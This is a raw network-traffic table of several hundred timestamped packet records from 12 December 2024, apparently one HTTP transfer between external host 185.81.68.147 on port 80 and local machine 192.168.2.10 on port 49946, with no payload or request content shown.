Dec 12, 2024 16:48:43.518593073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.518702984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.518754959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.519608974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.519732952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.519838095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.520606041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.520699024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.520800114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.521719933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.521795988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.521845102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.522648096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.522767067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.522814035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.523691893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.523760080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.523813963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.524663925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.524936914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.525038958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.525696039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.525811911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.525861025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.526679993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.526796103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.526850939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.527733088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.527861118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.527966022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.528693914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.528789043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.528886080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.529647112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.572185993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.667901993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.668163061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.668266058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.668380976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.668509960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.668596983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.669081926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.669430971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.669523001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.669995070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.670859098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.670948982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.671030998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.671914101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.672000885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.672060013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.672070980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.672111988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.673067093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.673216105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.673300028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.674072981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.674249887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.674334049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.675090075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.675734997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.675825119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.676081896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.677135944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.677146912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.677192926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.677227974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.677243948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.678101063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.678354025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.678437948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.679162025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.679349899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.679438114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.680336952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.680614948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.680696964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.681225061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.681243896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.681351900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.682207108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.682320118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.682400942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.683229923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.683728933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.683814049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.684251070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.684350014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.684436083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.685280085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.685292006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.685389996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.686261892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.686383963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.686474085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.687289953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.687302113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.687401056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.688524008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.688566923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.688651085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.689475060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.689486027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.689590931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.690330982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.690609932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.690695047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.691339970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.691912889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.692001104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.692380905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.692394018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.692501068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.693335056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.693427086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.693510056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.694439888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.694672108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.694777012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.695369005 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.695739985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.695823908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.696448088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.697093010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.697200060 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.697468996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.697479963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.697519064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.698451042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.698662996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.698753119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.699455023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.699531078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.699635029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.700457096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.701514006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.701524973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.701546907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.701601982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.701631069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.702454090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.702745914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.702920914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.703641891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.703979969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.704070091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.704556942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.704566956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.704658985 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.705526114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.705846071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.705929995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.706558943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.706572056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.706671953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.707617044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.707787037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.707870960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.708651066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.708766937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.708847046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.709564924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.709606886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.709688902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.710580111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.710936069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.711021900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.711637974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.711910009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.711994886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.712675095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.712699890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.712800980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.713671923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.713815928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.713907003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.714693069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.715310097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.715399027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.715708017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.715728045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.715811014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.716728926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.716739893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.716840029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.717729092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.717739105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.717839956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.718971968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.719228983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.719325066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.719744921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.719855070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.719939947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.720755100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.775324106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.860356092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.860399961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.860527992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.860739946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.860948086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.861146927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.861771107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.861958981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.862061024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.862762928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.862937927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.863042116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.863945007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.863953114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.864053965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.864849091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.865056038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.865139008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.865947008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.865953922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.866063118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.867268085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.867275000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.867374897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.867904902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.868056059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.868154049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.868845940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.869911909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.869919062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.869930983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.870021105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.871004105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.871941090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.871973991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.871979952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.872035027 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.872059107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.872937918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.873982906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.873990059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.874015093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.874083996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.874113083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.874944925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.875741959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.875838041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.875977039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.877048969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.877059937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.877130985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.877134085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.877310991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.878057003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.878063917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.878165960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.879017115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.879946947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.880083084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.880089998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.880098104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.880124092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.881105900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.881544113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.881674051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.882081985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.882951975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.883055925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.883176088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.883183956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.883284092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.884109974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.885128021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.885134935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.885160923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.885232925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.885268927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.886267900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.886377096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.886471033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.887142897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.888062000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.888164997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.888202906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.888210058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.888308048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.889184952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.889569998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.889662981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.890239954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.890417099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.890523911 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.891239882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.891247988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.891344070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.892190933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.892355919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.892450094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.893330097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.894289970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.894473076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.894479036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.894480944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.894593000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.895275116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.895754099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.895879984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.896287918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.897380114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.897387028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.897422075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.897475958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.897500038 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.898330927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.898408890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.898510933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.899373055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.899539948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.899631977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.900342941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.901124954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.901295900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.901454926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.901462078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.901559114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.902352095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.903033018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.903146029 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.903387070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.903654099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.903810978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.904365063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.905424118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.905431032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.905457973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.905517101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.905543089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.906455040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.907025099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.907135010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.907448053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.907881975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.908467054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.908516884 CET	49946	80	192.168.2.10	185.81.68.147
